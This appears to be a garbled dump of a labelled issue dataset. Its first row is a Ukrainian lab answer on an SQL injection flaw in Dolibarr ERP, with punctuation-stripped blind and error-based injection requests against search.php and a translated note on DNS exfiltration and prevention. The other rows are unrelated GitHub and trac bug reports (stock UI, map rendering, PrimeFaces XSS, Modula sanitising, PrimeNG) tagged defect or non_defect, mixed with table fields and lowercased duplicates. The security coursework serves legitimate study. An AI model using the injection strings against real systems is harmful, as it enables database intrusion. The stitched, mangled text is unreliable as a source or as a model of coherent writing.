запитання № запитання опишіть пз в якому знайдено вразливість назва пз url посилання в інтернеті знайти через пошукову систему призначення пз та приклади споживачів які можуть бути зацікавлені у використанні пз відповідь dolibarr dolibarr erp crm — це сучасний програмний пакет який допомагає керувати діяльністю вашої організації контакти постачальники рахунки фактури замовлення запаси порядок денний… це пакет програмного забезпечення з відкритим кодом призначений для малих середніх і великих компаній фондів і фрілансерів запитання № запитання опишіть знайдену вразливість переклавшу на українську розділ description відповідь атаки sql ін’єкції можуть призвести до несанкціонованого доступу до конфіденційних даних таких як паролі дані кредитної картки або особиста інформація користувача багато резонансних витоків даних за останні роки були результатом атак sql ін’єкцій що призвело до шкоди репутації та регуляторних штрафів у деяких випадках зловмисник може отримати постійний бекдор до систем організації що призведе до довгострокового злому який може залишатися непоміченим протягом тривалого періоду це вражає лише та або нижче та або вище не уражені запитання № запитання наведіть фрагменти прикладів уразливого програмного коду розглянувши розділ references to advisories solutions and tools відповідь часова сліпа sql ін єкція get search php s select select sleep jsch http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers sql ін єкція на основі аналізу помилок get search php s and extractvalue concat select elt vmlg http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers логічна сліпа sql ін єкція get search php s or alaa http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers запитання № бали запитання в таблиці наведено url посилання на наукові публікації пов’язані з sql injection розглянувши приклад публікації номер якої співпадає з номером вашого варіанту виконання лабораторних робіт перекладіть української вказані назви розділи відповідь поради щодо профілактики щоб уникнути атак описаних у цьому документі запобігання недолікам sqli має мати найвищий пріоритет найбезпечнішим запобіжним заходом вважається використання готових заяв підготовлені оператори гарантують що зловмисники не зможуть змінити мету запиту навіть якщо вставляються інші команди sql різноманітні механізми очищення такі як magic quotes і addslashes не можуть повністю запобігти наявності або використанню вразливості sqli оскільки певні методи які використовуються в поєднанні з умовами середовища можуть дозволити зловмисникам використовувати вразливість натомість якщо підготовлені оператори не використовуються рекомендується використовувати перевірку введення з відхиленням неправильного введення а не екрануванням або зміною адміністратор повинен завжди бути готовим до несанкціонованого доступу до основної бази даних хорошим контрзаходом є обмеження доступу до бази даних до найменших привілеїв таким чином будь який наданий привілей повинен бути наданий найменшій кількості коду необхідного для найкоротшого періоду часу необхідного для виконання роботи дотримуючись цього принципу користувачі повинні мати доступ лише до тієї інформації та ресурсів які є абсолютно необхідними в якості останнього кроку для успішного пом’якшення можливих атак екстракції dns адміністратор повинен переконатися що виконання всіх непотрібних системних підпрограм обмежено якщо все не вдається зловмисники не повинні мати змоги запустити ті які можуть спровокувати запити dns була проведена певна робота в області виявлення шкідливих дій у dns трафіку але здебільшого через відсутність практичних і основних рішень вони не будуть спеціально згадуватися тут висновок у цьому документі було показано як зловмисники можуть використовувати техніку ексфільтрації dns щоб значно прискорити пошук даних коли можна використовувати лише відносно повільні методи sqli крім того різко зменшено кількість необхідних запитів до вразливого веб сервера що робить його менш шумним через вимогу контролю над сервером доменних імен він ймовірно не буде використовуватися більшістю зловмисників з точки зору впровадження все було просто тому не можна ігнорувати його практичну цінність реалізована підтримка всередині sqlmap повинна зробити його загальнодоступним для всіх для подальших досліджень
| 0
|
56,780
| 15,366,102,618
|
IssuesEvent
|
2021-03-02 00:46:07
|
allanweinert/projetoBar
|
https://api.github.com/repos/allanweinert/projetoBar
|
opened
|
Movimentação de estoque - Botão cancelar mantém ultimo card utilizado
|
Defect
|
Após iniciar a inclusão de um cadastro, sem finaliza-lo, e posteriormente clicar em cancelar, o sistema mantém o último card utilizado e não trás a tela ao estado inicial que deveria.



|
1.0
|
Movimentação de estoque - Botão cancelar mantém ultimo card utilizado - Após iniciar a inclusão de um cadastro, sem finaliza-lo, e posteriormente clicar em cancelar, o sistema mantém o último card utilizado e não trás a tela ao estado inicial que deveria.



|
defect
|
movimentação de estoque botão cancelar mantém ultimo card utilizado após iniciar a inclusão de um cadastro sem finaliza lo e posteriormente clicar em cancelar o sistema mantém o último card utilizado e não trás a tela ao estado inicial que deveria
| 1
|
59,656
| 17,023,193,226
|
IssuesEvent
|
2021-07-03 00:47:53
|
tomhughes/trac-tickets
|
https://api.github.com/repos/tomhughes/trac-tickets
|
closed
|
waterway=stream rendering
|
Component: osmarender Priority: major Resolution: fixed Type: defect
|
**[Submitted to the original trac issue database at 11.02pm, Monday, 24th December 2007]**
The render result for a stream is inconsistent on different zoom levels. On at least z12 the color is off. On z13 the line is wider than on z14 (it should be the other way around). Personally I prefer the width at z14 as it's matches the width of the streams I have traced. It should be even thinner on z13, z12...
Unless that suggested width feature is implemented.
|
1.0
|
waterway=stream rendering - **[Submitted to the original trac issue database at 11.02pm, Monday, 24th December 2007]**
The render result for a stream is inconsistent on different zoom levels. On at least z12 the color is off. On z13 the line is wider than on z14 (it should be the other way around). Personally I prefer the width at z14 as it's matches the width of the streams I have traced. It should be even thinner on z13, z12...
Unless that suggested width feature is implemented.
|
defect
|
waterway stream rendering the render result for a stream is inconsistent on different zoom levels on at least the color is off on the line is wider than on it should be the other way around personally i prefer the width at as it s matches the width of the streams i have traced it should be even thinner on unless that suggested width feature is implemented
| 1
|
17,105
| 2,974,598,069
|
IssuesEvent
|
2015-07-15 02:13:31
|
Reimashi/jotai
|
https://api.github.com/repos/Reimashi/jotai
|
closed
|
Add Feature to Allow User to Specify "Significant Number" and/or "Decimal Places" Reporting of Parameters
|
auto-migrated Priority-Medium Type-Defect
|
```
What is the expected output? What do you see instead?
The output shows basically raw data, which are often reported to absolutely
ridiculous number of places / decimal places.
For the most part, the numbers reported for temperatures, voltages, fan RPMs,
etc aren't accurate to more than 2 or 3 numbers, never mind 3 decimal places.
For example, reporting a temperature to XX.X decimals is ridiculous when the
temperature reporting accuracy is +/- 5 degree C (that's NOT 0.5C...it's 5C)and
significant latencies are also involved.
Similarly for voltages that report to XX.XXX decimals when at BEST the actual
measurement accuracy is +/- 0.1V on many motherboards.
Same thing for fan RPMs that are reported to an instantaneous XXXX RPM when the
meaningful accuracy is +/- 100 RPM. So instead of "busying up" the screen with
changing numbers everytime the RPM changes by 1 or even 10 RPM, let the user
specify he's only interested when the RPM changes by 100 or more...e.g. CPU
Fan= XX00 or X00 RPM
Let the user specify how many numbers he considers valid (or worth reporting)
for a given parameter.
What version of the product are you using? On what operating system?
0.3.2beta
WinXP (32 and 64bit)
Please provide any additional information below.
N/A
Please attach a Report created with "File / Save Report..."
N/A
```
Original issue reported on code.google.com by `transgen...@gmail.com` on 12 Sep 2011 at 5:37
|
1.0
|
Add Feature to Allow User to Specify "Significant Number" and/or "Decimal Places" Reporting of Parameters - ```
What is the expected output? What do you see instead?
The output shows basically raw data, which are often reported to absolutely
ridiculous number of places / decimal places.
For the most part, the numbers reported for temperatures, voltages, fan RPMs,
etc aren't accurate to more than 2 or 3 numbers, never mind 3 decimal places.
For example, reporting a temperature to XX.X decimals is ridiculous when the
temperature reporting accuracy is +/- 5 degree C (that's NOT 0.5C...it's 5C)and
significant latencies are also involved.
Similarly for voltages that report to XX.XXX decimals when at BEST the actual
measurement accuracy is +/- 0.1V on many motherboards.
Same thing for fan RPMs that are reported to an instantaneous XXXX RPM when the
meaningful accuracy is +/- 100 RPM. So instead of "busying up" the screen with
changing numbers everytime the RPM changes by 1 or even 10 RPM, let the user
specify he's only interested when the RPM changes by 100 or more...e.g. CPU
Fan= XX00 or X00 RPM
Let the user specify how many numbers he considers valid (or worth reporting)
for a given parameter.
What version of the product are you using? On what operating system?
0.3.2beta
WinXP (32 and 64bit)
Please provide any additional information below.
N/A
Please attach a Report created with "File / Save Report..."
N/A
```
Original issue reported on code.google.com by `transgen...@gmail.com` on 12 Sep 2011 at 5:37
|
defect
|
add feature to allow user to specify significant number and or decimal places reporting of parameters what is the expected output what do you see instead the output shows basically raw data which are often reported to absolutely ridiculous number of places decimal places for the most part the numbers reported for temperatures voltages fan rpms etc aren t accurate to more than or numbers never mind decimal places for example reporting a temperature to xx x decimals is ridiculous when the temperature reporting accuracy is degree c that s not it s and significant latencies are also involved similarly for voltages that report to xx xxx decimals when at best the actual measurement accuracy is on many motherboards same thing for fan rpms that are reported to an instantaneous xxxx rpm when the meaningful accuracy is rpm so instead of busying up the screen with changing numbers everytime the rpm changes by or even rpm let the user specify he s only interested when the rpm changes by or more e g cpu fan or rpm let the user specify how many numbers he considers valid or worth reporting for a given parameter what version of the product are you using on what operating system winxp and please provide any additional information below n a please attach a report created with file save report n a original issue reported on code google com by transgen gmail com on sep at
| 1
|
419,664
| 28,150,085,711
|
IssuesEvent
|
2023-04-02 23:09:40
|
johndpjr/AgTern
|
https://api.github.com/repos/johndpjr/AgTern
|
opened
|
Create scraping process diagram
|
documentation
|
### Context
The code will get incredibly convoluted if we don't have a central place to document our scraping process. If we want it to scale, use multiple scrapers at a time, and update internships on a regular basis efficiently, we'll need to spell out the steps.
### TODO
- [ ] Create a process diagram for the scraper
- [ ] Share the process diagram over Discord
- [ ] Add this process to the wiki
### Notes
|
1.0
|
Create scraping process diagram - ### Context
The code will get incredibly convoluted if we don't have a central place to document our scraping process. If we want it to scale, use multiple scrapers at a time, and update internships on a regular basis efficiently, we'll need to spell out the steps.
### TODO
- [ ] Create a process diagram for the scraper
- [ ] Share the process diagram over Discord
- [ ] Add this process to the wiki
### Notes
|
non_defect
|
create scraping process diagram context the code will get incredibly convoluted if we don t have a central place to document our scraping process if we want it to scale use multiple scrapers at a time and update internships on a regular basis efficiently we ll need to spell out the steps todo create a process diagram for the scraper share the process diagram over discord add this process to the wiki notes
| 0
|
55,881
| 14,739,321,561
|
IssuesEvent
|
2021-01-07 06:58:02
|
primefaces/primefaces
|
https://api.github.com/repos/primefaces/primefaces
|
opened
|
jQuery UI Touch Punch 1.0.5: XSS Issue
|
defect
|
Hi,
We had a penetration testing of our application using Primefaces 8.0 and got this finding:
>jQuery UI Touch Punch 1.0.5
>URL: .../javax.faces.resource/jquery/jquery-plugins.js
>
>NODEJS:328 Cross-Site Scripting (XSS) -> https://vulners.com/nodejs/NODEJS:328
>NODEJS:329 Cross-Site Scripting -> https://vulners.com/nodejs/NODEJS:329
>NODEJS:330 Denial of Service -> https://vulners.com/nodejs/NODEJS:330
It looks like that the jQuery UI Touch Punch Plugin is not maintained. Last commit is of 2014, website is down:
https://github.com/furf/jquery-ui-touch-punch
http://touchpunch.furf.com/
But there is a new fork with commits of 2019 and 2020:
https://github.com/RWAP/jquery-ui-touch-punch
Maybe Primefaces should change to this new fork?
|
1.0
|
jQuery UI Touch Punch 1.0.5: XSS Issue - Hi,
We had a penetration testing of our application using Primefaces 8.0 and got this finding:
>jQuery UI Touch Punch 1.0.5
>URL: .../javax.faces.resource/jquery/jquery-plugins.js
>
>NODEJS:328 Cross-Site Scripting (XSS) -> https://vulners.com/nodejs/NODEJS:328
>NODEJS:329 Cross-Site Scripting -> https://vulners.com/nodejs/NODEJS:329
>NODEJS:330 Denial of Service -> https://vulners.com/nodejs/NODEJS:330
It looks like that the jQuery UI Touch Punch Plugin is not maintained. Last commit is of 2014, website is down:
https://github.com/furf/jquery-ui-touch-punch
http://touchpunch.furf.com/
But there is a new fork with commits of 2019 and 2020:
https://github.com/RWAP/jquery-ui-touch-punch
Maybe Primefaces should change to this new fork?
|
defect
|
jquery ui touch punch xss issue hi we had a penetration testing of our application using primefaces and got this finding jquery ui touch punch url javax faces resource jquery jquery plugins js nodejs cross site scripting xss nodejs cross site scripting nodejs denial of service it looks like that the jquery ui touch punch plugin is not maintained last commit is of website is down but there is a new fork with commits of and maybe primefaces should change to this new fork
| 1
|
32,069
| 6,700,438,252
|
IssuesEvent
|
2017-10-11 04:47:48
|
jwwolfe/innsystems
|
https://api.github.com/repos/jwwolfe/innsystems
|
closed
|
Incomplete GUIs
|
auto-migrated Component-UI Performance Priority-Critical Type-Defect Usability
|
```
The controller/client GUIs are not in a finished state. The controller is
more complete then the client which needs major work, but both are in a
state of chaos. The controller needs to have best particle, position, and
other information being displayed and the buttons needs to be set so they work.
The client is almost totally unfinished. The buttons need to be assigned
functions and the entire look needs to be streamlined and cleaned up. It
needs to be able to pull out the information such a current particle epoch
number or the number of data sets already run. This information needs to be
pulled out of the program and displayed in the GUI in an effective manner
that does not tie up the main GUI thread for too long.
```
Original issue reported on code.google.com by `darkbird44@gmail.com` on 26 Mar 2007 at 4:50
|
1.0
|
Incomplete GUIs - ```
The controller/client GUIs are not in a finished state. The controller is
more complete then the client which needs major work, but both are in a
state of chaos. The controller needs to have best particle, position, and
other information being displayed and the buttons needs to be set so they work.
The client is almost totally unfinished. The buttons need to be assigned
functions and the entire look needs to be streamlined and cleaned up. It
needs to be able to pull out the information such a current particle epoch
number or the number of data sets already run. This information needs to be
pulled out of the program and displayed in the GUI in an effective manner
that does not tie up the main GUI thread for too long.
```
Original issue reported on code.google.com by `darkbird44@gmail.com` on 26 Mar 2007 at 4:50
|
defect
|
incomplete guis the controller client guis are not in a finished state the controller is more complete then the client which needs major work but both are in a state of chaos the controller needs to have best particle position and other information being displayed and the buttons needs to be set so they work the client is almost totally unfinished the buttons need to be assigned functions and the entire look needs to be streamlined and cleaned up it needs to be able to pull out the information such a current particle epoch number or the number of data sets already run this information needs to be pulled out of the program and displayed in the gui in an effective manner that does not tie up the main gui thread for too long original issue reported on code google com by gmail com on mar at
| 1
|
72,062
| 23,912,764,368
|
IssuesEvent
|
2022-09-09 09:45:11
|
primefaces/primeng
|
https://api.github.com/repos/primefaces/primeng
|
opened
|
Flag country from MenuImte
|
defect
|
### Describe the bug
I want too add flag country on MenuItem for each countries.
```
{
id: 'langId',
label: this.translate.instant('language'),
icon: 'pi pi-flag',
items: [
{
label: 'English',
command: () => this.i18nService.language = 'en',
},
{
label: 'Italiano',
command: () => this.i18nService.language = 'it',
}
]
},
```
### Environment
Windows 10, Chrom
### Reproducer
_No response_
### Angular version
14.2.1
### PrimeNG version
14.0.1
### Build / Runtime
Angular CLI App
### Language
ALL
### Node version (for AoT issues node --version)
16.14.2
### Browser(s)
All
### Steps to reproduce the behavior
_No response_
### Expected behavior
Where and how can I find the countris icon to add?
no html and inline solutions.
|
1.0
|
Flag country from MenuImte - ### Describe the bug
I want too add flag country on MenuItem for each countries.
```
{
id: 'langId',
label: this.translate.instant('language'),
icon: 'pi pi-flag',
items: [
{
label: 'English',
command: () => this.i18nService.language = 'en',
},
{
label: 'Italiano',
command: () => this.i18nService.language = 'it',
}
]
},
```
### Environment
Windows 10, Chrom
### Reproducer
_No response_
### Angular version
14.2.1
### PrimeNG version
14.0.1
### Build / Runtime
Angular CLI App
### Language
ALL
### Node version (for AoT issues node --version)
16.14.2
### Browser(s)
All
### Steps to reproduce the behavior
_No response_
### Expected behavior
Where and how can I find the countris icon to add?
no html and inline solutions.
|
defect
|
flag country from menuimte describe the bug i want too add flag country on menuitem for each countries id langid label this translate instant language icon pi pi flag items label english command this language en label italiano command this language it environment windows chrom reproducer no response angular version primeng version build runtime angular cli app language all node version for aot issues node version browser s all steps to reproduce the behavior no response expected behavior where and how can i find the countris icon to add no html and inline solutions
| 1
|
242,984
| 20,329,405,157
|
IssuesEvent
|
2022-02-18 09:15:05
|
WPChill/modula-lite
|
https://api.github.com/repos/WPChill/modula-lite
|
closed
|
Sanitize mobile_gutter input
|
bug need testing
|
**Describe the bug**
A person can add whatever there. Maybe add a maximum ammount you can have there also
**To Reproduce**
Add a mobile number in the mobile_gutter and save .
**Expected behavior**
Add a telephone number and when saving you should have a refreshed ammount.
**Screenshots**

<!-- You can check these boxes once you've created the issue. -->
* Which addons do you have installed:
- [ ] Modula PRO
- [ ] Albums
- [ ] Slider
- [ ] Lightbox Slideshow
- [ ] Password Protect
- [ ] Watermark
- [ ] Deeplink
- [ ] Right-Click Protection
- [ ] Advanced Shortcode
- [ ] SpeedUp
- [ ] Video
<!-- You can check these boxes once you've created the issue. -->
* Which browser is affected (or browsers):
- [ ] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other <!-- please specify -->
<!-- You can check these boxes once you've created the issue. -->
* Which device is affected (or devices):
- [ ] Desktop
- [ ] Tablet
- [ ] Mobile
- [ ] Other <!-- please specify -->
#### Used versions
* WordPress version:
* Modula Lite version:
* Modula PRO version: -
* Albums version: -
* Slider version: -
* Lightbox Slideshow version: -
* Password Protect version: -
* Watermark version: -
* Deeplink version: -
* Right-Click Protection version: -
* Advanced Shortcode version: -
* SpeedUp version: -
* Video version: -
|
1.0
|
Sanitize mobile_gutter input - **Describe the bug**
A person can add whatever there. Maybe add a maximum ammount you can have there also
**To Reproduce**
Add a mobile number in the mobile_gutter and save .
**Expected behavior**
Add a telephone number and when saving you should have a refreshed ammount.
**Screenshots**

<!-- You can check these boxes once you've created the issue. -->
* Which addons do you have installed:
- [ ] Modula PRO
- [ ] Albums
- [ ] Slider
- [ ] Lightbox Slideshow
- [ ] Password Protect
- [ ] Watermark
- [ ] Deeplink
- [ ] Right-Click Protection
- [ ] Advanced Shortcode
- [ ] SpeedUp
- [ ] Video
<!-- You can check these boxes once you've created the issue. -->
* Which browser is affected (or browsers):
- [ ] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other <!-- please specify -->
<!-- You can check these boxes once you've created the issue. -->
* Which device is affected (or devices):
- [ ] Desktop
- [ ] Tablet
- [ ] Mobile
- [ ] Other <!-- please specify -->
#### Used versions
* WordPress version:
* Modula Lite version:
* Modula PRO version: -
* Albums version: -
* Slider version: -
* Lightbox Slideshow version: -
* Password Protect version: -
* Watermark version: -
* Deeplink version: -
* Right-Click Protection version: -
* Advanced Shortcode version: -
* SpeedUp version: -
* Video version: -
|
non_defect
|
sanitize mobile gutter input describe the bug a person can add whatever there maybe add a maximum ammount you can have there also to reproduce add a mobile number in the mobile gutter and save expected behavior add a telephone number and when saving you should have a refreshed ammount screenshots which addons do you have installed modula pro albums slider lightbox slideshow password protect watermark deeplink right click protection advanced shortcode speedup video which browser is affected or browsers chrome firefox safari other which device is affected or devices desktop tablet mobile other used versions wordpress version modula lite version modula pro version albums version slider version lightbox slideshow version password protect version watermark version deeplink version right click protection version advanced shortcode version speedup version video version
| 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.